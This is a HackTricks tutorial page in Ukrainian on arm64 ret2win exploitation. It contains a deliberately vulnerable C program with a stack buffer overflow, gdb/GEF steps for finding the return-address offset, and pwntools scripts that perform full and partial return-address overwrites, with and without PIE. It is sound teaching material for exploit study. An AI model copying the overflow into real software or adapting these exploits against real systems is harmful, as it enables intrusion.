HackTricksRet2win - arm64
Reading time: 4 minutes
tip
Вивчайте та практикуйте AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.
Знайдіть вступ до arm64 у:
Code
#include <stdio.h>
#include <unistd.h>
void win() {
printf("Congratulations!\n");
}
void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}
int main() {
vulnerable_function();
return 0;
}
Скомпілювати без pie та canary:
clang -o ret2win ret2win.c -fno-stack-protector -Wno-format-security -no-pie
Знаходження зсуву
Варіант з шаблоном
Цей приклад був створений за допомогою GEF:
Запустіть gdb з gef, створіть шаблон і використайте його:
gdb -q ./ret2win
pattern create 200
run
.png)
arm64 спробує повернутися за адресою в регістрі x30 (який був скомпрометований), ми можемо використати це, щоб знайти зсув шаблону:
pattern search $x30
.png)
Зсув становить 72 (9x48).
Варіант зсуву стеку
Почніть з отримання адреси стеку, де зберігається регістр pc:
gdb -q ./ret2win
b *vulnerable_function + 0xc
run
info frame
.png)
Тепер встановіть точку зупинки після read() і продовжте, поки read() не буде виконано, і встановіть шаблон, наприклад, 13371337:
b *vulnerable_function+28
c
.png)
Знайдіть, де цей шаблон зберігається в пам'яті:
.png)
Тоді: 0xfffffffff148 - 0xfffffffff100 = 0x48 = 72
.png)
No PIE
Regular
Отримайте адресу функції win:
objdump -d ret2win | grep win
ret2win: file format elf64-littleaarch64
00000000004006c4 <win>:
Експлуатація:
from pwn import *
# Configuration
binary_name = './ret2win'
p = process(binary_name)
# Prepare the payload
offset = 72
ret2win_addr = p64(0x00000000004006c4)
payload = b'A' * offset + ret2win_addr
# Send the payload
p.send(payload)
# Check response
print(p.recvline())
p.close()
.png)
Off-by-1
Насправді, це буде більше схоже на off-by-2 у збереженому PC у стеку. Замість того, щоб перезаписувати всю адресу повернення, ми перезапишемо тільки останні 2 байти значенням 0x06c4.
from pwn import *
# Configuration
binary_name = './ret2win'
p = process(binary_name)
# Prepare the payload
offset = 72
ret2win_addr = p16(0x06c4)
payload = b'A' * offset + ret2win_addr
# Send the payload
p.send(payload)
# Check response
print(p.recvline())
p.close()
.png)
Ви можете знайти ще один приклад off-by-one в ARM64 за посиланням https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/, який є справжнім off-by-one у вигаданій вразливості.
З PIE
tip
Скомпілюйте бінарний файл без аргументу -no-pie
Off-by-2
Без leak ми не знаємо точну адресу виграшної функції, але можемо знати зсув функції від бінарного файлу, і знаючи, що адреса повернення, яку ми перезаписуємо, вже вказує на близьку адресу, можливо витягти зсув до виграшної функції (0x7d4) у цьому випадку і просто використати цей зсув:
.png)
from pwn import *
# Configuration
binary_name = './ret2win'
p = process(binary_name)
# Prepare the payload
offset = 72
ret2win_addr = p16(0x07d4)
payload = b'A' * offset + ret2win_addr
# Send the payload
p.send(payload)
# Check response
print(p.recvline())
p.close()
tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.